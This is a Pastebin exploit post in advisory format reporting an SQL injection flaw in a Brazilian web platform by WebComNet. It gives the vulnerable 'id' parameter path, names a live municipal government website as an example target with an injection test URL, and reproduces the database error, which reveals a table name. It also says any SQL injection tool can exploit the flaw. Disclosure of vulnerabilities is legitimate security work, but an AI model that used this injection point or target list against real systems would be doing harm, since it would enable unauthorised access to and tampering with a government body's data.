KingSkrupellos

WebComNet Tecnologia da Informação Brazil SQL Injection

Apr 24th, 2019
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : WebComNet Tecnologia da Informação Brazil SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/04/2019
  7. # Vendor Homepage : webcomnet.com.br
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. WebComNet Tecnologia da Informação Brazil is prone to an SQL-injection vulnerability because
  22.  
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24.  
  25. Exploiting this issue could allow an attacker to compromise the application, access or
  26.  
  27. modify data, or exploit latent vulnerabilities in the underlying database.
  28.  
  29. A remote attacker can send a specially crafted request to the vulnerable application and
  30.  
  31. execute arbitrary SQL commands in application`s database. Further exploitation of this
  32.  
  33. vulnerability may result in unauthorized data manipulation.
  34.  
  35. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  36.  
  37. ###################################################################
  38.  
  39. # SQL Injection Exploit :
  40. **********************
  41. /site/home/index.php?p=conteudo&id=[SQL Injection]
  42.  
  43. ###################################################################
  44.  
  45. # Example Vulnerable Sites :
  46. *************************
  47. Prefeitura Municipal de Itumbiara Brazil Government Municipality
  48.  
  49. [+] itumbiara.go.gov.br/site/home/index.php?p=conteudo&id=21%27
  50.  
  51. ###################################################################
  52.  
  53. # Example SQL Database Error :
  54. ****************************
  55. # 1064 - Você tem um erro de sintaxe no seu SQL próximo a '\'' na linha 1
  56.  
  57. SELECT * FROM tbconteudo WHERE id_conteudo=21\'
  58.  
  59. ###################################################################
  60.  
  61. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  62.  
  63. ###################################################################
Add Comment
Please, Sign In to add comment